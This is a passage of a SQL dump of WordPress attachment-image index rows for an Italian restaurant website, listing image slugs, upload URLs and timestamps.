19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2118,NULL,NULL,4267,'post','attachment',1,0,NULL,NULL,'our-history-right-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/our-history-right-img.jpg',NULL,'4267','attachment-image',NULL,NULL,NULL,'4267','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:08','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2119,NULL,NULL,42,'post','attachment',1,0,NULL,NULL,'shop-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-5.jpg',NULL,'42','attachment-image',NULL,NULL,NULL,'42','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2120,NULL,NULL,4268,'post','attachment',1,0,NULL,NULL,'shop-img-16','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-16.jpg',NULL,'4268','attachment-image',NULL,NULL,NULL,'4268','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2121,NULL,NULL,156,'post','attachment',1,0,NULL,NULL,'h1-img-6','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-6.jpg',NULL,'156','attachment-image',NULL,NULL,NULL,'156','attachment-image',NULL,0,1,NULL,'2021-01-23 17:54:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2122,NULL,NULL,4269,'post','attachment',1,0,NULL,NULL,'h8-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-1.jpg',NULL,'4269','attachment-image',NULL,NULL,NULL,'4269','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:11','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2123,NULL,NULL,4270,'post','attachment',1,0,NULL,NULL,'our-history-left-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/our-history-left-img.jpg',NULL,'4270','attachment-image',NULL,NULL,NULL,'4270','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:11','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2124,NULL,NULL,4271,'post','attachment',1,0,NULL,NULL,'shop-img-17','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-17.jpg',NULL,'4271','attachment-image',NULL,NULL,NULL,'4271','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2125,NULL,NULL,4272,'post','attachment',1,0,NULL,NULL,'shop-img-13','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-13.jpg',NULL,'4272','attachment-image',NULL,NULL,NULL,'4272','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2126,NULL,NULL,4273,'post','attachment',1,0,NULL,NULL,'shop-img-6','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-6.jpg',NULL,'4273','attachment-image',NULL,NULL,NULL,'4273','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2127,NULL,NULL,4274,'post','attachment',1,0,NULL,NULL,'our-history-section-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/our-history-section-img.jpg',NULL,'4274','attachment-image',NULL,NULL,NULL,'4274','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2128,NULL,NULL,4275,'post','attachment',1,0,NULL,NULL,'h8-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-3.jpg',NULL,'4275','attachment-image',NULL,NULL,NULL,'4275','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2129,NULL,NULL,4276,'post','attachment',1,0,NULL,NULL,'h1-single-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-1.jpg',NULL,'4276','attachment-image',NULL,NULL,NULL,'4276','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2130,NULL,NULL,587,'post','attachment',1,0,NULL,NULL,'h8-img-2a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-2a.jpg',NULL,'587','attachment-image',NULL,NULL,NULL,'587','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2131,NULL,NULL,4277,'post','attachment',1,0,NULL,NULL,'shop-img-18','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-18.jpg',NULL,'4277','attachment-image',NULL,NULL,NULL,'4277','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2132,NULL,NULL,4278,'post','attachment',1,0,NULL,NULL,'kitchen-content-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-content-img.jpg',NULL,'4278','attachment-image',NULL,NULL,NULL,'4278','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2133,NULL,NULL,4279,'post','attachment',1,0,NULL,NULL,'visit-us-parallax','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/visit-us-parallax.jpg',NULL,'4279','attachment-image',NULL,NULL,NULL,'4279','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2134,NULL,NULL,44,'post','attachment',1,0,NULL,NULL,'shop-img-7','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-7.jpg',NULL,'44','attachment-image',NULL,NULL,NULL,'44','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:16','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2135,NULL,NULL,4280,'post','attachment',1,0,NULL,NULL,'h1-single-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-2.jpg',NULL,'4280','attachment-image',NULL,NULL,NULL,'4280','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:17','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2136,NULL,NULL,4281,'post','attachment',1,0,NULL,NULL,'kitchen-right-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-right-img.jpg',NULL,'4281','attachment-image',NULL,NULL,NULL,'4281','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2137,NULL,NULL,4282,'post','attachment',1,0,NULL,NULL,'shop-img-19','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-19.jpg',NULL,'4282','attachment-image',NULL,NULL,NULL,'4282','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2138,NULL,NULL,4283,'post','attachment',1,0,NULL,NULL,'h1-single-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-3.jpg',NULL,'4283','attachment-image',NULL,NULL,NULL,'4283','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2139,NULL,NULL,4284,'post','attachment',1,0,NULL,NULL,'h8-img-4','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-4.jpg',NULL,'4284','attachment-image',NULL,NULL,NULL,'4284','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2140,NULL,NULL,4285,'post','attachment',1,0,NULL,NULL,'shop-img-8','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-8.jpg',NULL,'4285','attachment-image',NULL,NULL,NULL,'4285','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2141,NULL,NULL,4286,'post','attachment',1,0,NULL,NULL,'shop-img-24','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-24.jpg',NULL,'4286','attachment-image',NULL,NULL,NULL,'4286','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:20','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2142,NULL,NULL,171,'post','attachment',1,0,NULL,NULL,'h1-single-img-4','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-single-img-4.jpg',NULL,'171','attachment-image',NULL,NULL,NULL,'171','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2143,NULL,NULL,4287,'post','attachment',1,0,NULL,NULL,'shop-img-20','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-20.jpg',NULL,'4287','attachment-image',NULL,NULL,NULL,'4287','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2144,NULL,NULL,46,'post','attachment',1,0,NULL,NULL,'shop-img-9','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-9.jpg',NULL,'46','attachment-image',NULL,NULL,NULL,'46','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2145,NULL,NULL,4288,'post','attachment',1,0,NULL,NULL,'h8-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-5.jpg',NULL,'4288','attachment-image',NULL,NULL,NULL,'4288','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2146,NULL,NULL,4289,'post','attachment',1,0,NULL,NULL,'h1-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-2.jpg',NULL,'4289','attachment-image',NULL,NULL,NULL,'4289','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2147,NULL,NULL,4290,'post','attachment',1,0,NULL,NULL,'shop-img-25','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-25.jpg',NULL,'4290','attachment-image',NULL,NULL,NULL,'4290','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2148,NULL,NULL,4291,'post','attachment',1,0,NULL,NULL,'h8-img-6','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h8-img-6.jpg',NULL,'4291','attachment-image',NULL,NULL,NULL,'4291','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2149,NULL,NULL,4292,'post','attachment',1,0,NULL,NULL,'shop-img-21','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-21.jpg',NULL,'4292','attachment-image',NULL,NULL,NULL,'4292','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2150,NULL,NULL,4293,'post','attachment',1,0,NULL,NULL,'h1-img-7','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-7.jpg',NULL,'4293','attachment-image',NULL,NULL,NULL,'4293','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2151,NULL,NULL,4294,'post','attachment',1,0,NULL,NULL,'shop-img-10','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-10.jpg',NULL,'4294','attachment-image',NULL,NULL,NULL,'4294','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2152,NULL,NULL,4295,'post','attachment',1,0,NULL,NULL,'h1-img-3','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-img-3.jpg',NULL,'4295','attachment-image',NULL,NULL,NULL,'4295','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2153,NULL,NULL,4296,'post','attachment',1,0,NULL,NULL,'shop-img-26','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-26.jpg',NULL,'4296','attachment-image',NULL,NULL,NULL,'4296','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:26','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2154,NULL,NULL,205,'post','attachment',1,0,NULL,NULL,'h1-img-8a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-8a.jpg',NULL,'205','attachment-image',NULL,NULL,NULL,'205','attachment-image',NULL,0,1,NULL,'2021-01-23 17:54:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2155,NULL,NULL,4297,'post','attachment',1,0,NULL,NULL,'kitchen-right-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-right-img-1.jpg',NULL,'4297','attachment-image',NULL,NULL,NULL,'4297','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:29','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2156,NULL,NULL,4298,'post','attachment',1,0,NULL,NULL,'shop-img-11','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/shop-img-11.jpg',NULL,'4298','attachment-image',NULL,NULL,NULL,'4298','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:29','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2157,NULL,NULL,4299,'post','attachment',1,0,NULL,NULL,'shop-img-27','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-27.jpg',NULL,'4299','attachment-image',NULL,NULL,NULL,'4299','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:29','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2158,NULL,NULL,4300,'post','attachment',1,0,NULL,NULL,'signature-chef','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/signature-chef.png',NULL,'4300','attachment-image',NULL,NULL,NULL,'4300','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:29','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2159,NULL,NULL,206,'post','attachment',1,0,NULL,NULL,'h1-img-9a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/h1-img-9a.jpg',NULL,'206','attachment-image',NULL,NULL,NULL,'206','attachment-image',NULL,0,1,NULL,'2021-01-23 17:54:30','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2160,NULL,NULL,4301,'post','attachment',1,0,NULL,NULL,'logo','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png',NULL,'4301','attachment-image',NULL,NULL,NULL,'4301','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:32','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2161,NULL,NULL,4302,'post','attachment',1,0,NULL,NULL,'shop-img-28','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-28.jpg',NULL,'4302','attachment-image',NULL,NULL,NULL,'4302','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2162,NULL,NULL,4303,'post','attachment',1,0,NULL,NULL,'accolades-left-img','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/accolades-left-img.png',NULL,'4303','attachment-image',NULL,NULL,NULL,'4303','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2163,NULL,NULL,4304,'post','attachment',1,0,NULL,NULL,'kitchen-img-gallery-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/kitchen-img-gallery-1.jpg',NULL,'4304','attachment-image',NULL,NULL,NULL,'4304','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:33','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2164,NULL,NULL,4305,'post','attachment',1,0,NULL,NULL,'h7-port-img-2','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-2.jpg',NULL,'4305','attachment-image',NULL,NULL,NULL,'4305','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2165,NULL,NULL,522,'post','attachment',1,0,NULL,NULL,'shop-img-29','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-29.jpg',NULL,'522','attachment-image',NULL,NULL,NULL,'522','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:35','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2166,NULL,NULL,4306,'post','attachment',1,0,NULL,NULL,'logo-light','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo-light.png',NULL,'4306','attachment-image',NULL,NULL,NULL,'4306','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:36','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2167,NULL,NULL,4307,'post','attachment',1,0,NULL,NULL,'h6-img-5a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-5a.jpg',NULL,'4307','attachment-image',NULL,NULL,NULL,'4307','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:36','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2168,NULL,NULL,4308,'post','attachment',1,0,NULL,NULL,'h5-img-9','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-9.jpg',NULL,'4308','attachment-image',NULL,NULL,NULL,'4308','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:36','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2169,NULL,NULL,4309,'post','attachment',1,0,NULL,NULL,'h4-rev-img-1a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-1a.jpg',NULL,'4309','attachment-image',NULL,NULL,NULL,'4309','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2170,NULL,NULL,4310,'post','attachment',1,0,NULL,NULL,'h5-img-11','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-11.jpg',NULL,'4310','attachment-image',NULL,NULL,NULL,'4310','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2171,NULL,NULL,4311,'post','attachment',1,0,NULL,NULL,'h7-port-img-4','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-4.jpg',NULL,'4311','attachment-image',NULL,NULL,NULL,'4311','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2172,NULL,NULL,4312,'post','attachment',1,0,NULL,NULL,'h6-img-7a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-7a.jpg',NULL,'4312','attachment-image',NULL,NULL,NULL,'4312','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2173,NULL,NULL,1488,'post','attachment',1,0,NULL,NULL,'h5-img-7a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-7a.png',NULL,'1488','attachment-image',NULL,NULL,NULL,'1488','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2174,NULL,NULL,4313,'post','attachment',1,0,NULL,NULL,'h4-rev-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-1.jpg',NULL,'4313','attachment-image',NULL,NULL,NULL,'4313','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2175,NULL,NULL,4314,'post','attachment',1,0,NULL,NULL,'h5-img-12','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-12.jpg',NULL,'4314','attachment-image',NULL,NULL,NULL,'4314','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2176,NULL,NULL,4315,'post','attachment',1,0,NULL,NULL,'h5-img-13','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-13.png',NULL,'4315','attachment-image',NULL,NULL,NULL,'4315','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:42','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2177,NULL,NULL,4316,'post','attachment',1,0,NULL,NULL,'h6-img-8a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-8a.jpg',NULL,'4316','attachment-image',NULL,NULL,NULL,'4316','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2178,NULL,NULL,1507,'post','attachment',1,0,NULL,NULL,'h5-img-10a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-10a.png',NULL,'1507','attachment-image',NULL,NULL,NULL,'1507','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2179,NULL,NULL,4317,'post','attachment',1,0,NULL,NULL,'h7-port-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h7-port-img-5.jpg',NULL,'4317','attachment-image',NULL,NULL,NULL,'4317','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2180,NULL,NULL,1700,'post','attachment',1,0,NULL,NULL,'blog-post-img-8','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/blog-post-img-8.jpg',NULL,'1700','attachment-image',NULL,NULL,NULL,'1700','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:54:43','2021-01-29 